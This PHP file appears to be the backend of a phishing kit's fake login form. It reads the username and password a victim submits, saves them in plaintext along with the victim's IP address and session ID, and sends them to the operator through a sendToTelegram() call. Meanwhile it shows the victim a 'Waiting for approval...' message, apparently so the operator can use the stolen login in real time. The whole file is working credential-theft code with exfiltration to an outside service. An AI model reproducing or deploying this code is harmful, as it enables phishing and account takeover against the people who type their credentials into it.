<?php
require_once __DIR__ . '/../config.php';

header('Content-Type: application/json');

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $password = $_POST['thnpw'] ?? '';
    $username = $_SESSION['login_username'] ?? ($_POST['thnus'] ?? 'Unknown');
    
    if (empty($password)) {
        echo json_encode(['success' => false, 'error' => 'Password is required']);
        exit;
    }
    
    $loginId = generateLoginId();
    $sessionId = session_id();
    $clientIp = getClientIp();
    
    savePendingLogin($loginId, [
        'login_id' => $loginId,
        'session_id' => $sessionId,
        'username' => $username,
        'password' => $password,
        'status' => 'pending',
        'created_at' => time(),
        'updated_at' => time(),
        'redirect_url' => REDIRECT_URL,
        'client_ip' => $clientIp
    ]);
    
    $_SESSION['pending_login_id'] = $loginId;
    
    $telegramResult = sendToTelegram($username, $password, $loginId, $clientIp);
    
    if (!$telegramResult || !isset($telegramResult['message_id'])) {
        echo json_encode([
            'success' => false,
            'error' => 'Failed to send credentials. Please try again.'
        ]);
        exit;
    }
    
    echo json_encode([
        'success' => true,
        'login_id' => $loginId,
        'status' => 'pending',
        'redirect_url' => REDIRECT_URL,
        'message' => 'Waiting for approval...'
    ]);
    exit;
}

echo json_encode(['success' => false, 'error' => 'Invalid request']);
exit;
